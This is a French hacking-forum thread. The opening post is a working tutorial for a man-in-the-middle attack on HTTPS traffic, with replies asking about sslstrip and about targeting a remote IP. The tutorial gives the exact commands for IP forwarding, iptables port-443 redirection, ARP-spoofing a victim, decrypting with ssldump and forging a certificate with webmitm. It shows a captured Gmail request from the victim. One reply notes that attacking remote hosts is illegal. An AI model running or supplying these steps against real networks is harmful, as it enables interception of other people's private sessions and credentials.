ssl/https sniff avec arpspoof + ssldump

[Nagual]

Voici un simple exemple de sniff https / ssl

on active l'ip forwarding

Code:

debian:/home/s3th#  echo 1 > /proc/sys/net/ipv4/ip_forward

on ajoute quelques règles à iptables

Code:

debian:/home/s3th#  iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT
debian:/home/s3th#  iptables -A FORWARD -j ACCEPT

on spoof notre victime

Code:

debian:/home/s3th#  arpspoof -t 192.168.1.59 192.168.1.1

on peut créer son certif avec webmitm -d ou utiliser celui d'ettercap

Code:

debian:/home/s3th# ssldump -n -d -k /usr/share/ettercap/etter.ssl.crt | tee ssldump.log

exemple de capture en live

Code:

New TCP connection #1: 192.168.1.59(3090) <-> 74.125.39.19(80)
0.0201 (0.0201)  C>S
---------------------------------------------------------------
G*T /mail/h/1wndzcfmocomi/?logout&hl=fr H**P/1.1
Host: mail.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://mail.google.com/mail/h/1wndzcfmocomi/?hl=fr&tab=wm&zy=l&gausr=....

exemple de certif avec webmitm

Code:

debian:/home/s3th# webmitm -d
Generating RSA private key, 1024 bit long modulus
..........++++++
.........................................++++++
e is 65537 (0x10001)
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) ¦AU¦:CH
State or Province Name (full name) ¦Some-State¦:Suisse
Locality Name (eg, city) ¦¦:
Organization Name (eg, company) ¦Internet Widgits Pty Ltd¦:
Organizational Unit Name (eg, section) ¦¦:
Common Name (eg, YOUR name) ¦¦:Notre server
Email Address ¦¦:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password ¦¦:
An optional company name ¦¦:
Signature ok
subject=/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd
Getting Private key
webmitm: certificate generated
webmitm: relaying transparently

merci seth pour tous tes howto!
je les testerais!!!

et continue comme ça!

[baggi]

hum une petite question, si j'ai bien compris sslstrip permet de ne plus avoir de message d'erreur de certificat sur mon second poste, pourtant aprésa voir suivi a la lettre le tuto dés que je me connecte a un site sécurisé j'ai une erreur de certificat...
ai-je mal compris l'utilitée de sslstrip ou est ce que je fais quelquechose de travers ?

[Hokiko]

Chez moi ça dépend, avec la v0.4 il arrive que j'ai des messages pour les certifs mais ça reste rare. J'ignore à quoi c'est du. En tout cas sous IE ça passe niquel.

[juciguse]

merci seth pour tous tes howto!

[elfrst]

Quote:

Originally Posted by Nagual

on spoof notre victime

Code:

debian:/home/s3th#  arpspoof -t 192.168.1.59 192.168.1.1

Allo, moi j'accroche ici,

si j'écris mon ip de poste comme par exemple 192.168.100.105 et le 192.168.1.1 de mon routeur, ouais ca marche bien, mais si je veux attaquer un IP autre que celui de ma maison. J'inscris quoi?

Code:

arpspoof -t 82.242.xx.xx 192.168.1.1   ???

merci de votre temps donnée

[sanguinarius]

Bonjour,

Reponse typique d'une personne n'ayant aucune connaissance et ne se donnant pas la peine de comprendre.

Avant de faire kikoolol jsuis un hacker, apprend plutout ce qu'est ARP les limites d'ARP les failles d'ARP.

Et vue que tu ne t'es pas donner la peine de chercher et d'apprendre jpense que peux de gens ici te donnerons d'autre reponse que "apprend".

Ps: Frameip est un tres bon site pour les reseaux

[elfrst]

Quote:

Originally Posted by sanguinarius

Bonjour,

Reponse typique d'une personne n'ayant aucune connaissance et ne se donnant pas la peine de comprendre.

Avant de faire kikoolol jsuis un hacker, apprend plutout ce qu'est ARP les limites d'ARP les failles d'ARP.

Et vue que tu ne t'es pas donner la peine de chercher et d'apprendre jpense que peux de gens ici te donnerons d'autre reponse que "apprend".

Ps: Frameip est un tres bon site pour les reseaux

Tu as surement commencé quelque part toi??
moi et oui, 2 semaines que j'ai installé BT4 et oui je lis depuis ce temps et je test beaucoup.

une réponse de type francophone surement, prendre le temps de répondre mais sans donner l'info demandé ..

non je ne suis pas kikoulol comme tu dis je veux juste apprendre et j'ai voulu dans ce cas ci sauter une étape de lecture en le demandant carrément ici!

sinon merci pour frameip

[sanguinarius]

Ahh tu peux etre decu, je ne fourni pas de reponse toute faire sauf cas exceptionnel, je te fourni des pistes, les pistes tu les as et tu as meme un site ou chercher les reponses.

Apprend a apprendre en premier lieux, c'est pas l'education national ici on donne pas des reponses toute faites pour faire plaisir au mec qui pose la question.

[hickSs]

il faut que tu comprenes que Nagual's nous donne ici un tuto de ssl strip en MITM retien ce mot MITM pour man in the middle. Pour ce qui est de faire cela sur un IP distant comprend que cela 1 est illégal et 2 très très difficile a faire je vois même pas comment le faire d'ailleur.